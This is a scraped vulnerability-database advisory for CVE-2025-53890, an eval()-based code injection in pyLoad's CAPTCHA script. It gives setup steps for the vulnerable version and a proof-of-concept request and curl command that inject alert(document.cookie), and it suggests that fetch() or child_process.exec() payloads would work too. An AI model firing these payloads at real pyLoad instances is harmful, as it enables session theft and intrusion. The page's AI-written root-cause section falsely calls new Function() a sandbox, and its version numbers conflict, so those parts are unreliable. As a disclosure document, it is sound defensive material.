9.8

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-53890

CVE-2025-53890: pyLoad vulnerable to XSS through insecure CAPTCHA

Summary

An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows unauthenticated remote attackers to execute arbitrary code in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce.

Details

The vulnerable code resides in

function onCaptchaResult(result) {
    eval(result); // Direct execution of attacker-controlled input
}

The onCaptchaResult() function directly passes CAPTCHA results (sent from the user) into eval()
No sanitization or validation is performed on this input
A malicious CAPTCHA result can include JavaScript such as fetch() or child_process.exec() in environments using NodeJS
Attackers can fully hijack sessions and pivot to remote code execution on the server if the environment allows it

Reproduction Methods

Official Source Installation:

git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload

Virtual Environment:

python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload

CAPTCHA Endpoint Verification

Technical Clarification:

The vulnerable endpoint is actually:
```
/interactive/captcha
```
Complete PoC Request:

POST /interactive/captcha HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded

cid=123&response=1%3Balert(document.cookie)

Curl Command Correction:

curl -X POST "http://localhost:8000/interactive/captcha" \
  -d "cid=123&response=1%3Balert(document.cookie)"

Vulnerable Code Location:
The eval() vulnerability is confirmed in:
```
src/pyload/webui/app/static/js/captcha-interactive.user.js
```

Resources

https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546
OWASP: Avoid eval()
#4586

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-53890

CVE-2025-53890:

9.8

CVSS Score

3.1

-

CVSS Score

Basic Information

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
pyload-ng	pip	< 0.20	0.20

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The analysis of the vulnerability is based on the provided commit 909e5c97885237530d1264cfceb5555870eb9546. The commit shows a change in src/pyload/webui/app/static/js/captcha-interactive.user.js, where a call to eval() is replaced. The vulnerable code is within an anonymous function registered as a message event listener. This listener parses the event data and executes a script contained within it using eval(). This is a classic code injection vulnerability. An attacker can craft a malicious message to the browser window, which, when processed by this event listener, will execute arbitrary JavaScript. This can be used to steal session cookies, perform actions on behalf of the user, or pivot to other attacks. The root cause is the direct use of eval() on untrusted input. The provided patch mitigates this by using new Function() to execute the code in a sandboxed environment, preventing it from accessing the surrounding scope and sensitive data.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

9.8

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-53890: pyLoad vulnerable to XSS through insecure CAPTCHA

Summary

Details

Reproduction Methods

CAPTCHA Endpoint Verification

Resources

CVE-2025-53890:

9.8

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Basic Information

Basic Information

Technical Details

CVE-2025-53890: pyLoad vulnerable to XSS through insecure CAPTCHA

Summary

Details

Reproduction Methods

CAPTCHA Endpoint Verification

Resources

9.8

9.8

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI